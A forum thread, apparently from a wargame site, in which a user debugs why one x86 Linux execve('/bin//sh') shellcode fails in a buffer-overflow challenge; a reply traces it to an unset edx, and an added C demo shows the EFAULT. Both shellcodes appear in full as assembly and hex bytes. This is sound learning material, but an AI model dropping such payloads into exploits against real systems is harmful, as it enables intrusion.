App - System

Thursday 21 July 2016, 21:17  #1
App - System Shellcode strangely not working
Jeremy BEAUME
  • 4 posts

Hi!

I just succeeded at the Buffer overflow basic 4 challenge.
While working on it, I ran into something I just can't explain.
I had a shellcode launching /bin/sh, the usual one, and it did not work.
I changed it for another one found on the net, and that one worked. I just can't explain why. Here are the codes:

SHELLCODE_KO (not working):

xor eax,eax            ; eax = 0
push eax               ; NUL terminator of the path string
push dword 0x68732f2f  ; "//sh"
push dword 0x6e69622f  ; "/bin"  -> esp now points to "/bin//sh\0"
mov ebx,esp            ; ebx = path (1st execve argument)
push eax               ; argv[1] = NULL
push ebx               ; argv[0] = path
mov ecx,esp            ; ecx = argv (2nd execve argument)
mov al,0xb             ; eax = 11 = execve
int 0x80               ; edx (envp, 3rd argument) is never set by this code

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

=== when debugging, breaking at the int 0x80 instruction:

eax 0xb
ebx 0xffffcdb8
ecx 0xffffcdb0
edx 0x41

x/6w $esp:

0xffffcdb0: 0xffffcdb8 0x00000000 0x6e69622f 0x68732f2f
0xffffcdc0: 0x00000000 0x00000000

So it should run syscall 0xb, execve, on the string at 0xffffcdb8, i.e. "/bin//sh". Why is it not working?
I can't understand why it does push eax and push ebx on lines 6 and 7 either?

And it's not just the shellcode itself: I tested it with a simple C program, and it does work, but not on the ELF from this challenge...

=======================================================================================

SHELLCODE_OK (this one works and indeed spawns a shell):

xor ecx,ecx            ; ecx = 0
mul ecx                ; eax = eax*ecx = 0, and edx = 0 (high half of the product)
push ecx               ; NUL terminator of the path string
push dword 0x68732f2f  ; "//sh"
push dword 0x6e69622f  ; "/bin"
mov ebx,esp            ; ebx = path; ecx = argv = NULL; edx = envp = NULL
mov al,0xb             ; eax = 11 = execve
int 0x80

\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80

=== at the int 0x80 instruction:

eax 0xb
ebx 0xffffcdb8
ecx 0x0
edx 0x0

x/6w $esp:

0xffffcdb8: 0x6e69622f 0x68732f2f 0x00000000 0x00000000
0xffffcdc8: 0x00000044 0x00000004

The syscall got the same parameters, didn't it? So why is this one working? That's my question =)

I'm not giving a script to easily reproduce this "error", so as not to spoil the challenge.

Thanks for your help, I'd really like to understand this before proceeding to the next challenges!

Thursday 21 July 2016, 21:57  #2
App - System Shellcode strangely not working
vic
  • 15 posts

The first shellcode simply doesn't set the value of the EDX register.
It can then be anything, and it surely isn't a char** type as expected by the execve syscall. You can see the return value of the syscall in EAX; if it is negative (most significant bit set), then an error happened.
You simply have to xor EDX, EDX before triggering the syscall.
In the second shellcode, you cannot see any operation directly involving EDX, because the mul instruction multiplies ECX (zero) by EAX (any value) and stores the result in both the EAX and EDX registers (avoiding overflow). Hence, EDX and EAX are implicitly set to zero in one instruction.
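
An added example (not from this thread) that reproduces the explanation above from C through the raw syscall interface: the same execve call succeeds when envp is NULL (the edx = 0 case of SHELLCODE_OK) and fails with EFAULT when envp is the stale 0x41 that edx held in the first dump. The `-c 'exit 42'` arguments and the fork/wait wrapper are my additions so the parent can report the outcome instead of being replaced by the shell.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed argv: argv[0] is the same "/bin//sh" string the posted shellcode
 * builds on the stack; "-c" "exit 42" is added so a successful exec is visible
 * as the child's exit status. */
static char *const demo_argv[] = { "/bin//sh", "-c", "exit 42", NULL };

/* Raw execve, so the kernel receives exactly the three values the int 0x80
 * stub passes in ebx (path), ecx (argv) and edx (envp). A successful execve
 * never returns; on failure it returns -1 and errno says why. */
static long raw_execve(char *const envp[])
{
    return syscall(SYS_execve, "/bin//sh", demo_argv, envp);
}

/* Run the exec in a forked child so the caller survives to inspect the result.
 * Returns 42 if the shell actually ran, or the errno execve failed with
 * (EFAULT = 14 for an unreadable envp pointer), or -1 on fork/wait trouble. */
int exec_status_with_envp(char *const envp[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        raw_execve(envp);       /* only returns if the kernel rejected the call */
        _exit(errno);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* edx = 0 (SHELLCODE_OK): Linux accepts a NULL envp. */
    printf("envp = NULL -> %d (42 means the shell ran)\n",
           exec_status_with_envp(NULL));
    /* edx = 0x41 (the stale value in the SHELLCODE_KO dump): EFAULT. */
    printf("envp = 0x41 -> %d (EFAULT is %d)\n",
           exec_status_with_envp((char *const *)0x41), EFAULT);
    return 0;
}
```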

Friday 22 July 2016, 11:15  #3
App - System Shellcode strangely not working [SOLVED]
Jeremy BEAUME
  • 4 posts

Thanks, now I understand!

I was indeed missing information... I used this syscall table:
http://docs.cs.up.ac.za/programming/asm/derick_tut/syscalls.html

And it states that the execve syscall doesn't use the ecx and edx values. But it does! Hence my mistake...

Thanks again =)